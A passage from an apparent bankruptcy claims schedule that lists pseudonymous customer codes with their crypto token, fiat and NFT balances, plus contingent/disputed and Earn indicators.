| 07394202 | | BTC[0], CUSDT[1], DOGE[.006], TRX[0.94941763], USD[0.05] | | |
| 07394206 | | BAT[1], BRZ[4], CUSDT[11], DOGE[23969.08722799], TRX[2], USD[0.40], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07394210 | | CUSDT[5], DOGE[0], TRX[1], USD[0.00], USDT[0] | | |
| 07394220 | | BRZ[2], BTC[.00036519], CUSDT[14], DOGE[4], ETH[.12552712], ETHW[.12438924], GRT[1.00367791], SHIB[3], SOL[1.25469566], TRX[9.00087675], USD[202.62], USDT[0] | Yes | |
| 07394221 | | BTC[0.01023735], CUSDT[9], DOGE[2], ETH[0], ETHW[0], LTC[3.02916254], MATIC[.00043004], SHIB[33209116.76831664], TRX[2], UNI[4.44272795], USD[0.00], USDT[0] | Yes | |
| 07394232 | | ALGO[.96], DOGE[.879], SOL[.0057], TRX[.654], USD[0.19] | | |
| 07394239 | | BTC[.01069703], DOGE[6.47031639], TRX[68.5000044], USD[0.00] | | |
| 07394241 | | USD[0.00], USDT[0] | Yes | |
| 07394242 | | ETH[.00579535], ETHW[.00579535], USD[0.00] | | |
| 07394246 | | WBTC[.0000344] | | |
| 07394249 | | CUSDT[2.00001726], USD[0.00] | | |
| 07394254 | | BAT[1], BRZ[1], BTC[.01863911], CUSDT[1], DOGE[3], ETH[.4393116], ETHW[.4393116], TRX[3], USD[0.01] | | |
| 07394261 | | DOGE[1], USD[0.00] | | |
| 07394263 | | AAVE[0], BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SHIB[273325.55736187], SOL[0], SUSHI[0], TRX[10.93796003], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07394269 | | NFT (304694653803364036/SolDoge Strays #273)[1], NFT (402750253702802675/SolDoge Strays #390)[1], NFT (462010947945641525/SolDoge Strays #121)[1], TRX[.00005], USD[0.00], USDT[0] | | |
| 07394271 | | DOGE[1294.45191333], USD[0.00], USDT[0] | | |
| 07394272 | | BCH[0], BRZ[0], BTC[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07394278 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07394284 | | USD[0.00] | Yes | |
| 07394287 | | ALGO[22.21953246], AVAX[2.63078689], BAT[26.67672686], BRZ[1], DOGE[406.78023373], GRT[133.11264312], KSHIB[494.0601617], LINK[3.338774], LTC[1.06311354], MATIC[118.42567108], NEAR[12.77229298], SHIB[577339529.00353894], SOL[3.02527156], SUSHI[22.50185416], TRX[0.00000600], UNI[2.29897365], USD[0.00], USDT[0] | Yes | |
| 07394288 | | SUSHI[0], TRX[2317.692], USD[0.01] | | |
| 07394290 | | DOGE[1], USD[0.01] | | |
| 07394295 | | CAD[5.44], CUSDT[104.53346871], DOGE[268.56954988], TRX[46.50013923], USD[0.00] | Yes | |
| 07394298 | | ETH[.01097092], ETHW[.01097092] | | |
| 07394301 | | USD[25.00] | | |
| 07394302 | | USD[0.00] | | |
| 07394307 | | DOGE[140.29706219], USD[0.00] | | |
| 07394314 | | GBP[7.06], USD[0.00] | | |
| 07394315 | | CUSDT[2], DOGE[3], USD[0.01] | | |
| 07394322 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07394329 | | BTC[.00137048], CUSDT[1], DOGE[2], ETH[.04063081], ETHW[.04063081], USD[0.00] | | |
| 07394330 | | BRZ[1], CUSDT[12], DOGE[0], NFT (453137471140611665/Momentum #170)[1], NFT (467454103714652880/3D CATPUNK #5513)[1], SHIB[1], TRX[2], USD[0.01], USDT[.00150843] | Yes | |
| 07394332 | | CUSDT[1], USD[0.00] | | |
| 07394336 | | CUSDT[1], SHIB[10703693.03864282], USD[0.00] | Yes | |
| 07394338 | | BAT[2], BCH[.71498318], BF_POINT[300], BRZ[2], CUSDT[4], DOGE[2939.0473242], GRT[1], TRX[8], USD[0.00], USDT[1.00000001] | | |
| 07394348 | | BAT[0], BTC[0], CUSDT[1], DOGE[0], TRX[0], USD[0.40], USDT[0.00000001] | | |
| 07394351 | | USD[0.00] | | |
| 07394352 | | DOGE[140.25524772], USD[0.00] | | |
| 07394356 | | BTC[.00020984], USD[0.00] | | |
| 07394357 | | CUSDT[2], DOGE[124.24418161], USD[0.02] | | |
| 07394363 | | CUSDT[2], USD[0.01] | | |
| 07394364 | | BAT[2], CUSDT[2], TRX[3], USD[0.06], USDT[1] | | |
| 07394369 | | DOGE[141.11477852], ETH[.00528706], ETHW[.00528706], USD[0.00] | | |
| 07394371 | | ETH[.5], ETHW[.5] | | |
| 07394373 | | SOL[10.49904404], USD[0.06] | | |
| 07394378 | | BAT[16.30460214], CUSDT[10401.48895154], DOGE[4559.05102643], GRT[26.41013911], TRX[2662.69174731], USD[0.00] | | |
| 07394380 | | USD[0.01] | Yes | |
| 07394381 | | BRZ[1], BTC[.0424352], CUSDT[1], DOGE[6504.3390241], ETH[.39316744], ETHW[.3930023], TRX[1814.04388865], USD[0.00] | Yes | |
| 07394388 | | SHIB[2315350.7756425], SOL[11.37615930], USD[0.00] | | |
| 07394389 | | BTC[0], NFT (326130464416973110/Imola Ticket Stub #697)[1], USD[0.00] | | |
| 07394390 | | DOGE[.00002497], USD[0.01] | | |
| 07394391 | | BAT[1], BRZ[1], CUSDT[17], LINK[3.64027404], SOL[9.86083122], TRX[2], USD[0.00], USDT[0] | | |
| 07394392 | | LINK[0], USD[0.01], USDT[0] | | |
| 07394393 | | USD[10.00] | | |
| 07394394 | | BRZ[1], CUSDT[4], DOGE[.39277095], ETH[.00018334], ETHW[.06274121], LTC[.00990525], SHIB[2], USD[155.48] | Yes | |
| 07394403 | | BRZ[11.80458233], BTC[0], CUSDT[31], DOGE[20.35372676], ETH[0], GRT[0], MATIC[30.71646064], SHIB[8385672.47442962], SOL[1.28193543], TRX[0.00860863], USD[0.00], USDT[3.22760233] | Yes | |
| 07394410 | | NFT (479989779351776481/Welcome to Dopamine)[1], SOL[.001] | | |
| 07394411 | | BTC[.00237244], CUSDT[2], DOGE[5], ETH[.05925054], ETHW[.05925054], SOL[.97704118], SUSHI[.91733948], UNI[.96954445], USD[18.00], USDT[1.98801997] | | |
| 07394422 | | BTC[.00074628], CUSDT[5], ETH[.02629196], ETHW[.02629196], TRX[1], USD[134.45] | | |
| 07394427 | | BAT[236.40802614], BRZ[2], DOGE[1349.51299226], GRT[1044.51975027], SHIB[9], SOL[7.51299561], TRX[8], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07394431 | | ETH[0], USD[0.00], USDT[0.52332812] | | |
| 07394432 | | CUSDT[1], DOGE[0], GRT[1], KSHIB[207.85334004], SHIB[7634831.73491937], SOL[2.17012368], TRX[92.33465867], USD[0.00], USDT[0] | Yes | |
| 07394439 | | BCH[0], BTC[0.00004058], DOGE[717.208], USD[0.08] | | |
| 07394440 | | BTC[0.00874545], GRT[104.49581904], SOL[19.74742791], SUSHI[.00000001], TRX[5511.96702504], USD[0.00], USDT[0.00000001] | | |
| 07394441 | | LINK[0], LTC[0], TRX[0] | | |
| 07394451 | | ETH[.00000001], ETHW[0.22186867] | | |
| 07394454 | | CUSDT[1], DOGE[1], TRX[1668.10686006], USD[0.00] | | |
| 07394455 | Contingent, Disputed | SUSHI[0] | | |
| 07394460 | | DOGE[0], ETH[.00014925], ETHW[0.00014925], USD[0.01], USDT[0] | | |
| 07394461 | | CUSDT[2], TRX[1.00012472], USD[0.01] | | |
| 07394463 | | CUSDT[1], DOGE[4535.62403521], GRT[.00086036], TRX[1], USD[0.00] | | |
| 07394464 | | BTC[0], ETH[.00000001], ETHW[0], NFT [548181130429073440/Kannibal Kev][1], NFT [560099633576646291/Barcelona Ticket Stub #691][1], SHIB[0], USD[0.00], USDT[0] | Yes | |
| 07394466 | | BRZ[1], CUSDT[1], DOGE[5], LINK[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07394469 | | DOGE[0], SOL[0], USD[0.00] | Yes | |
| 07394477 | | USD[0.00] | | |
| 07394481 | | BTC[0.00014172] | | |
| 07394484 | | DAI[.8985674], DOGE[21.14548418], ETH[.00022885], ETHW[.00022885], USD[0.00] | | |
| 07394487 | | BRZ[1], BTC[0.00343442], CUSDT[5], DOGE[0], GRT[1], LINK[5.67000331], SUSHI[0], TRX[3], USD[0.00], USDT[0] | | |
| 07394492 | | DOGE[5], USD[0.00] | | |
| 07394494 | | USD[0.00] | | |
| 07394497 | | BAT[1], BTC[0], CUSDT[3], ETH[0], LTC[0], TRX[0], USD[0.11] | | |
| 07394498 | | BRZ[1], CUSDT[3], DOGE[3], GRT[1], USD[0.00] | | |
| 07394500 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07394501 | | SOL[0.00010159], USD[0.00] | | |
| 07394504 | | BTC[.001998], ETH[.057942], ETHW[.057942], USD[3.40] | | |
| 07394505 | | BAT[1], BRZ[4], CUSDT[6], DOGE[1], GRT[2], TRX[4], USD[0.00] | | |
| 07394507 | | NFT [301398753327123931/Eitbit Ape #5504][1], NFT [302152070987940193/Eitbit Ape #5664][1], NFT [313515256846848569/Munch moon][1], NFT [313802958866781188/Solana Dog House #601][1], NFT [314142229831684504/Doge Capital #3985][1], NFT [324440212317386790/Toasty Doge Egg][1], NFT [342335712662618514/Eitbit Ape #4574][1], NFT [343963221995055016/Eitbit Ape #5003][1], NFT [344128446509989070/Eitbit Ape #5677][1], NFT [345518755912327337/Eitbit Ape #5684][1], NFT [349923540090241260/Eitbit Ape #6137][1], NFT [355543191148106333/Eitbit Ape #4149][1], NFT [358080550124228993/Eitbit Ape #6187][1], NFT [359227453398865690/Eitbit Ape #5218][1], NFT [359835017580420800/Eitbit Ape #2076][1], NFT [362252283127582473/Golden Woofer][1], NFT [369516491055060482/Eitbit Ape #6411][1], NFT [380159064722123768/Wealthy Whale #1359][1], NFT [381655394726903783/Eitbit Ape #4631][1], NFT [387853090379467076/Eitbit Ape #3968][1], NFT [393162974459208102/Golden Woofer][1], NFT [393981757363006502/Eitbit Ape #6122][1], NFT [402516683777315081/PepperMint][1], NFT [405737377832223610/Eitbit Ape #5675][1], NFT [406503643354837878/Eitbit Ape #4691][1], NFT [412931088166967758/Eitbit Ape #3320][1], NFT [417205148977993220/SOL Parasite #1687][1], NFT [418949185317035208/Eitbit Ape #3799][1], NFT [419435760257331539/Doge Capital #1623][1], NFT [420384221267099750/Eitbit Ape #5332][1], NFT [420779139361272415/Eitbit Ape #4991][1], NFT [442048230128544449/BabyBlob #0][1], NFT [442195599676013848/Golden Woofer][1], NFT [447886234629577745/Golden Woofer][1], NFT [451371259778879668/Kitty Key][1], NFT [454806891020999149/Eitbit Ape #5242][1], NFT [458011964462733180/TSM FTX 2021 Aurorian][1], NFT [460607808754534376/Eitbit Ape #4321][1], NFT [461243337176995514/Doge Capital #3693][1], NFT [473372843091878226/Bloombell][1], NFT [481675226054673484/Eitbit Ape #4885][1], NFT [482468746320990032/Eitbit Ape #3842][1], NFT [483093587074460125/KAM1 #7458][1], NFT [490775542625443291/Eitbit Ape #4600][1], NFT [510820160604730467/Eitbit Ape #5371][1], NFT [518167038940967038/Doge Capital #1966][1], NFT [526966151058996265/Doge Capital #1526][1], NFT [534388347454225446/Golden Woofer][1], NFT [560579520164045120/DinoBitten][1], NFT [563909293603090208/Eitbit Ape #4779][1], NFT [567327816410808960/Wealthy Whale #1362][1], NFT [573631797559761358/Golden bone pass][1], NFT [574358573382475479/Hannya Mask][1], SOL[0.00], USDT[.00438896] | | |
| 07394511 | | DOGE[143.57617232], USD[0.00] | | |
| 07394515 | | DOGE[0], ETH[0], LTC[.00477257], SOL[130.08899001], TRX[0], USD[0.00], USDT[0.00000037] | | |
| 07394518 | | BAT[1], DOGE[21397.40233698], USD[0.00], USDT[3] | | |
| 07394522 | | AAVE[0], BAT[0], BRZ[0], CUSDT[1], DOGE[1], ETH[0], GRT[0], KSHIB[0], LTC[0], MATIC[0], SHIB[7986.55872338], SOL[0], TRX[2], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07394523 | | USD[10.00] | | |
| 07394528 | | DOGE[1602.35815282], TRX[1], USD[0.00] | | |
| 07394529 | | USD[0.00] | | |
| 07394531 | | BRZ[1], CUSDT[1], USD[0.76] | | |
| 07394539 | | BTC[.00024337], CUSDT[12], ETH[.0121996], ETHW[.0121996], LTC[.04613449], USD[0.00], USDT[0] | | |
| 07394541 | Contingent, Disputed | BTC[0], USD[0.00], USDT[1] | | |
| 07394546 | | NFT [410392403485711892/Entrance Voucher #3891][1], NFT [473453738867486628/Australia Ticket Stub #1963][1], NFT [526649695581628276/Humpty Dumpty #613][1], NFT [570808049842953962/Series 1: Wizards #405][1], NFT [576122740074361908/Series 1: Capitals #443][1] | | |
| 07394547 | | USD[0.00] | | |
| 07394558 | | BRZ[2], BTC[.00533985], CUSDT[2], DOGE[1862.99895066], ETH[0.06747984], ETHW[0.06747984], TRX[2], USD[0.00], USDT[1] | | |
| 07394562 | | TRX[2], USD[0.00] | | |
| 07394563 | | CUSDT[1], DOGE[128.49189024], USD[0.00] | | |
| 07394564 | | NFT [360081727935540084/Pirate #2200][1], USD[0.00] | | |
| 07394570 | | DOGE[715.81060452], ETH[0], TRX[327.16371135], USD[80.52] | | |
| 07394576 | | CUSDT[2], DOGE[1062.72788875], USD[0.01] | | |
| 07394586 | | USD[0.00] | | |
| 07394590 | | USD[0.01] | | |
| 07394592 | | BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07394603 | | BAT[1581.09870443], BTC[.02181245], DOGE[2], ETH[.22224914], ETHW[.03332935], SHIB[2], USD[835.32], USDT[0.00403664] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07394607 | | USD[0.00] | | |
| 07394612 | | DOGE[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07394614 | | BTC[0], ETH[0], SOL[0.00000001], TRX[.000005], USD[0.01], USDT[0.00000024] | | |
| 07394617 | | BTC[.04084688], ETH[0.72125991], SOL[.00000001], USD[0.00] | Yes | |
| 07394621 | | USD[0.00] | | |
| 07394633 | | TRX[2], USD[0.01] | | |
| 07394636 | | CUSDT[1], DOGE[2.08825955], TRX[.9849303], USD[0.00] | | |
| 07394640 | | TRX[78.684], USDT[.03319487] | | |
| 07394647 | | NEAR[12.3], SUSHI[.236], USD[0.27] | | |
| 07394648 | | LINK[6.972], TRX[193.224], UNI[6.1752], USD[4.68], USDT[.98839] | | |
| 07394650 | | BRZ[1], BTC[0], CUSDT[4], ETH[0], USD[0.00] | Yes | |
| 07394652 | | USD[1.04] | | |
| 07394656 | | BRZ[1], CUSDT[1], DOGE[15.33503705], TRX[1], USD[0.00] | | |
| 07394659 | | BRZ[2], DOGE[3516.8820326], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07394665 | | BAT[0], BCH[0], BTC[0], CUSDT[35], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00004076], YFI[0] | | |
| 07394668 | | DOGE[153.93272997], TRX[1], USD[0.00] | | |
| 07394670 | | BAT[855.75738737], BRZ[5.07723288], BTC[.05311889], CUSDT[5182.2098952], DOGE[581.35300754], ETH[1.11700235], ETHW[1.11653315], GRT[85.47065263], LINK[6.78574547], SHIB[18100537.45391582], SOL[20.04383195], SUSHI[35.27171603], TRX[2086.92754007], UNI[10.63447421], USD[2148.51], YFI[.00682908] | Yes | |
| 07394673 | | BRZ[1], CUSDT[3], USD[0.01] | Yes | |
| 07394675 | | BRZ[1], DOGE[1.00022065], TRX[1], USD[0.01] | | |
| 07394683 | | BRZ[2], CUSDT[18], DOGE[2], USD[4.77] | | |
| 07394686 | | BTC[.00199704], DOGE[2], USD[0.74] | | |
| 07394690 | Contingent, Disputed | USD[0.00] | | |
| 07394691 | | DOGE[1669.71913599], TRX[1], USD[0.00] | | |
| 07394692 | | USD[0.00] | | |
| 07394698 | | CUSDT[1], DOGE[3], USD[0.00] | Yes | |
| 07394711 | | USD[0.00] | | |
| 07394712 | | NFT (362331340480886512/FTX - Off The Grid Miami #464)[1], TRX[.994], USD[0.00], YFI[.000991] | | |
| 07394718 | | BTC[0], ETH[0.00000001], ETHW[0], SHIB[16], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07394719 | | BTC[0.01959510], DOGE[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07394726 | | USD[10.00] | | |
| 07394728 | | LINK[.63629078], USD[0.00], USDT[0] | | |
| 07394730 | | BTC[0], TRX[0], USDT[0] | | |
| 07394746 | | TRX[199.8], USD[0.00], USDT[0] | | |
| 07394748 | Contingent, Disputed | BCH[0], BTC[0], CUSDT[0], ETH[0], GRT[0], LTC[0], USD[0.00], USDT[0] | | |
| 07394749 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07394753 | | ETH[0], ETHW[0] | | |
| 07394763 | | DOGE[178.22129825], USD[0.00] | | |
| 07394771 | | TRX[1.17285027], USD[0.00] | | |
| 07394775 | | SOL[0], USD[10.02] | | |
| 07394776 | | BTC[0], CUSDT[6], LINK[0], TRX[.00185743], USD[0.00] | Yes | |
| 07394784 | | USD[0.00] | | |
| 07394790 | | USD[0.11] | | |
| 07394806 | | USD[0.00] | | |
| 07394813 | | DOGE[131.16942962], USD[0.00] | | |
| 07394816 | | CUSDT[57.84408266], DOGE[248.68403564], TRX[217.47798103], USD[0.00] | Yes | |
| 07394817 | | CUSDT[1], DOGE[154.68423062], USD[0.00] | | |
| 07394835 | | LINK[0], USD[0.00] | | |
| 07394836 | | AUD[0.00], BTC[0], CAD[0.00], DOGE[0.26495628], ETH[0.00000001], ETHW[0], EUR[0.00], GBP[0.00], LINK[0.00000001], NFT (306026645638725708/StarAtlas Anniversary)[1], NFT (318640189138854611/StarAtlas Anniversary)[1], NFT (323009942582370303/Cracked Genopet Egg #618)[1], NFT (401320116079241027/StarAtlas Anniversary)[1], NFT (402851149135685425/StarAtlas Anniversary)[1], NFT (419380188479079759/StarAtlas Anniversary)[1], NFT (469963500711775136/StarAtlas Anniversary)[1], NFT (474166056146110564/StarAtlas Anniversary)[1], NFT (477245018891773923/StarAtlas Anniversary)[1], NFT (545992151400277799/Cracked Genopet Egg #295)[1], PAXG[0], SOL[0.39082715], SUSHI[0], TRX[.000001], USD[0.05], USDT[0.00000001] | | |
| 07394849 | Contingent, Disputed | BRZ[4], CUSDT[15], TRX[119.09876783], USD[0.00], USDT[0] | | |
| 07394850 | | DOGE[29.43079393], SOL[.04373003], USD[9.00] | | |
| 07394851 | | USD[0.01], USDT[0] | | |
| 07394868 | | BAT[1.0165555], CUSDT[1], DOGE[1], GRT[1.00498957], SOL[9.73195635], USD[0.00] | Yes | |
| 07394874 | | SHIB[1], USD[0.00] | Yes | |
| 07394882 | | BRZ[2], CUSDT[1], DOGE[870.49639263], TRX[.00001201], USD[0.00] | | |
| 07394886 | | TRX[1], USD[0.01] | | |
| 07394887 | | BCH[0], CUSDT[2], DOGE[139.41998086], LINK[.0325032], SOL[0.00003201], TRX[1.99105943], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07394888 | | TRX[5477.75119119], USD[0.00] | | |
| 07394889 | | BTC[.00737717], CUSDT[2], DOGE[4.02061908], ETH[.09101327], ETHW[.08996455], LINK[1.09705333], LTC[.54381395], MATIC[123.75983695], SOL[1.10123732], TRX[7], USD[0.00] | Yes | |
| 07394895 | | ALGO[0], AVAX[0], BAT[0], BF_POINT[200], BRZ[0], BTC[0.00000001], CUSDT[0], DOGE[88.24355992], ETH[0], ETHW[0], GRT[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07394905 | | CUSDT[1], TRX[.00165271], USD[0.00] | Yes | |
| 07394919 | | CUSDT[1], DOGE[1], ETH[.00000007], ETHW[.00000007], TRX[1], USD[0.03] | | |
| 07394920 | | SHIB[18086.73031389], USD[0.00] | Yes | |
| 07394923 | | BRZ[2], CUSDT[1], TRX[2], USD[0.00] | | |
| 07394924 | | NFT (410238412352919239/Coachella x FTX Weekend 2 #2272)[1] | | |
| 07394927 | | BAT[0], BRZ[2.05211932], CUSDT[2], DOGE[4], GRT[0], KSHIB[0], MATIC[0], SHIB[1.00000001], SOL[34.67939575], TRX[3], USD[0.00], USDT[1.02544136] | Yes | |
| 07394928 | | DOGE[.00253261], ETHW[.02750765], SHIB[2], USD[132.63] | | |
| 07394929 | | BAT[.79834518], BCH[.01125946], BRZ[3], BTC[.00175045], CUSDT[30.62144302], DOGE[16.11760663], ETH[.00416143], ETHW[.00416143], LINK[151.00067359], LTC[.13744487], SUSHI[.58992535], TRX[3], UNI[.27260471], USD[19.30], USDT[9.94009976] | | |
| 07394930 | | BTC[.0000996], USD[95.28] | | |
| 07394936 | | CUSDT[1], DOGE[1570.79399047], TRX[338.82184206], USD[0.00] | | |
| 07394943 | | USD[10.00] | | |
| 07394951 | | BTC[.08889299], CUSDT[1], USD[0.00] | | |
| 07394952 | | USD[10.00] | | |
| 07394958 | | BAT[18.10254012], BRZ[3], CUSDT[7], DOGE[1], GRT[4.09873263], SOL[1.16295511], TRX[3], USD[0.01] | Yes | |
| 07394960 | | BAT[1.0165555], USD[0.00] | Yes | |
| 07394961 | | USD[10.00] | | |
| 07394970 | | DOGE[960], TRX[1054.162514], USD[0.19] | | |
| 07394971 | | ETHW[.00536899], SHIB[1], USD[155.22] | Yes | |
| 07394972 | | BTC[0], USD[0.01] | | |
| 07394987 | | DOGE[36.7044283], USD[0.00] | | |
| 07394988 | | SUSHI[2.49], USD[3.91] | | |
| 07394991 | | USD[10.00] | | |
| 07394993 | | SOL[.25277456], USD[0.00] | Yes | |
| 07395000 | | BTC[.00204826], CUSDT[1], DOGE[559.63815917], ETH[.00000013], ETHW[.00000013], TRX[1], USD[0.00] | | |
| 07395001 | | CUSDT[2], DOGE[4], USD[0.01] | | |
| 07395002 | | USD[0.01] | | |
| 07395005 | | BAT[1.00899378], BTC[1.06968139], DOGE[2], ETH[11.41028444], ETHW[11.40697749], SOL[579.51526435], TRX[2], USD[969.40] | Yes | |
| 07395006 | | BRZ[1], BTC[.0094306], DOGE[921.78214153], ETH[.29608246], ETHW[.29588806], TRX[2], USD[0.00] | Yes | |
| 07395007 | | SHIB[191911.60035005], USD[0.00] | | |
| 07395012 | | BTC[.0016227], CUSDT[1], TRX[1], USD[0.00] | | |
| 07395021 | | USD[0.00], USDT[.00022676] | Yes | |
| 07395022 | | USD[53.04] | Yes | |
| 07395025 | | USD[0.00], USDT[0] | | |
| 07395029 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07395036 | | DOGE[1], USD[0.00] | | |
| 07395037 | | USD[200.00] | | |
| 07395038 | | USD[10.00] | | |
| 07395039 | | USD[0.00] | | |
| 07395045 | | USD[0.01] | | |
| 07395046 | | DOGE[0], USD[2.93] | | |
| 07395057 | | USD[0.00] | | |
| 07395060 | | BRZ[3], CUSDT[12], ETH[0], SOL[0], TRX[2], USD[0.00], USDT[0.00002095] | Yes | |
| 07395069 | | ETH[0], ETHW[0], SOL[0] | | |
| 07395073 | | BAT[0], BRZ[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.26989337] | | |
| 07395080 | | BRZ[1], CUSDT[1], GRT[145.38764204], TRX[1], USD[0.00], USDT[0] | | |
| 07395082 | | BRZ[1], CUSDT[3], DOGE[6702.45121413], TRX[1], USD[0.00] | Yes | |
| 07395085 | | ETH[1.01946396], ETHW[1.01946396], GRT[202.58316851] | | |
| 07395086 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[4811.08383595], ETH[.60543403], ETHW[.60517965], SHIB[1], TRX[5], UNI[.00327833], USD[0.00] | Yes | |
| 07395090 | | DOGE[1.9924], USD[0.29] | | |
| 07395093 | | USD[0.00] | | |
| 07395097 | | CUSDT[1], USD[0.00] | | |
| 07395101 | | DAI[0], SOL[0], SUSHI[0], USD[2.39], USDT[0] | | |
| 07395102 | | BRZ[2], BTC[.00181957], CUSDT[2], DOGE[1415.11002848], SHIB[1], TRX[4], USD[384.77] | Yes | |
| 07395103 | | BTC[0], ETH[.00000001], ETHW[0], SOL[.00000001], USD[0.19], USDT[0] | | |
| 07395105 | | BTC[0], SUSHI[169.84946124], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07395109 | | USD[0.79] | | |
| 07395111 | | AVAX[5.59249613], CUSDT[1], DOGE[1], LINK[30.58481472], SOL[27.80790112], TRX[1240.65863751], USD[269.03], USDT[1.05107889] | Yes | |
| 07395113 | | BAT[3], BRZ[1], GRT[3], LINK[1], SOL[1], TRX[2], USD[0.00], USDT[1] | | |
| 07395114 | | ETHW[.00024119], SOL[.00410072], USD[0.01] | | |
| 07395116 | | DOGE[142.85034726], TRX[1], USD[0.00] | | |
| 07395119 | | BTC[.0089082], ETH[.08691735], ETHW[.08691735], LINK[.09715], SOL[.9905], SUSHI[.4943], TRX[1771.31565], USD[117.02] | | |
| 07395122 | | NFT [375518181675611582/Romeo #324][1] | | |
| 07395127 | | USD[1.00], USDT[0] | | |
| 07395128 | | USD[5.00] | | |
| 07395131 | | BAT[0], BRZ[1], CUSDT[9], DOGE[2], SOL[0], TRX[0], USD[0.01] | | |
| 07395136 | | CUSDT[1], TRX[840.49462772], USD[10.00] | | |
| 07395138 | | BRZ[1], BTC[.0044872], CUSDT[3], DOGE[2015.36715577], ETH[.07174216], ETHW[.07174216], LTC[.395229], TRX[1], USD[0.00] | | |
| 07395139 | | CUSDT[3], DOGE[1], TRX[1.65833109], USD[0.00] | | |
| 07395140 | | BTC[.00007644], USD[798.39] | | |
| 07395145 | | ETH[.00000001], USDT[1.68211601] | | |
| 07395146 | | USD[10.00] | | |
| 07395148 | | USD[7.66] | | |
| 07395150 | | BTC[0.00002395], USD[0.60], USDT[0] | | |
| 07395153 | | USD[0.00] | | |
| 07395155 | | LTC[4.21308], USD[0.92] | | |
| 07395156 | | CUSDT[1], SOL[.00000128], TRX[338.48606989], USD[0.01] | | |
| 07395159 | | USD[0.08] | | |
| 07395160 | | SOL[9.96], USD[1.28] | | |
| 07395161 | | BRZ[2], CUSDT[3], DOGE[1], ETH[0], GRT[2.06731789], SOL[0], SUSHI[.00125404], TRX[5], USD[0.00] | Yes | |
| 07395169 | | CUSDT[4], USD[0.00] | | |
| 07395172 | | NFT [297211401669913949/Saudi Arabia Ticket Stub #2213][1], NFT [399137184710844067/FTX - Off The Grid Miami #1413][1] | | |
| 07395173 | | BTC[0], DOGE[0.88841288], ETH[0.00024581], ETHW[0.00024581], GRT[0], LTC[.00284], SOL[0], SUSHI[0.00200000], TRX[.274], USD[0.00], USDT[0] | | |
| 07395175 | | CUSDT[4], DOGE[128.46854264], ETH[.00548267], ETHW[.00548267], USD[0.00] | | |
| 07395178 | | USD[11.88], USDT[0] | | |
| 07395179 | | BTC[0.00006034], SOL[.0868], USD[0.00], USDT[0.00002543] | | |
| 07395190 | | CUSDT[1], DOGE[.00035601], USD[23.10], USDT[0.00000001] | | |
| 07395197 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07395204 | | DOGE[.233], USD[2.36], USDT[0.00138279] | | |
| 07395209 | Contingent, Disputed | BTC[.01199711], DOGE[0], USD[0.00] | | |
| 07395215 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07395216 | | BRZ[2], CUSDT[4], DOGE[4.04984199], TRX[3], USD[0.00] | Yes | |
| 07395221 | | USD[0.00], USDT[0] | | |
| 07395222 | | BTC[.0018924], USD[0.21] | | |
| 07395229 | | BAT[81.88244459], BCH[1.09591584], BRZ[1], CUSDT[6], DOGE[318.80053265], LTC[1.09657824], TRX[2966.00438242], USD[0.00] | Yes | |
| 07395237 | | NFT [502507044728082771/Series 1: Capitals #641][1] | | |
| 07395240 | | DOGE[2.80944], TRX[0.24974293], UNI[.00250059] | | |
| 07395247 | | CUSDT[1], USD[0.00] | | |
| 07395250 | | BCH[.07750511], DOGE[2899.37938765], LTC[.09176606], TRX[1], USD[0.00] | | |
| 07395257 | | USD[0.06] | | |
| 07395259 | | BAT[1], DOGE[1], USD[0.00] | | |
| 07395263 | | BRZ[1], CUSDT[3], DOGE[3], GRT[3], TRX[1], USD[0.00] | | |
| 07395264 | | BRZ[2], CUSDT[4], DOGE[23], ETH[.00000068], ETHW[.00000068], LINK[.00004241], LTC[0], SOL[0.00009533], SUSHI[.00007266], TRX[8], USD[0.00] | | |
| 07395267 | | BCH[.07793576], DOGE[2896.69867778], LTC[.09176606], TRX[1], USD[0.00] | | |
| 07395269 | | DOGE[.528], USDT[0] | | |
| 07395273 | | BTC[0], ETH[0.00099900], ETHW[0.00099900], SHIB[2000000], SOL[.02], TRX[0], USD[0.78] | | |
